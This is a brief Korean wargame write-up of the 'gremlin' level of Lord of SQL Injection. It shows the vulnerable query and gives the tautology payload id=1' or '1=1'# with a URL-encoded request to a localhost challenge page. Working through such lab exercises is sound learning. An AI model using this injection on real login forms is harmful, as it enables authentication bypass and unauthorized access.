los - gremlin
·
Lord_of_SQL-Injections_I
가장 기본적인 필터링이 적용된 문제이다. "select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}'"; 쿼리에 대한 실행 결과가 있기만 하면 클리어 되는 문제이기 때문에 가장 기본적인 id=1' or '1=1'"# 을 입력한다. http://localhost/gremlin_280c5552de8b681110e9287421b834fd.php?id=1%27%20or%20%271=1%27%23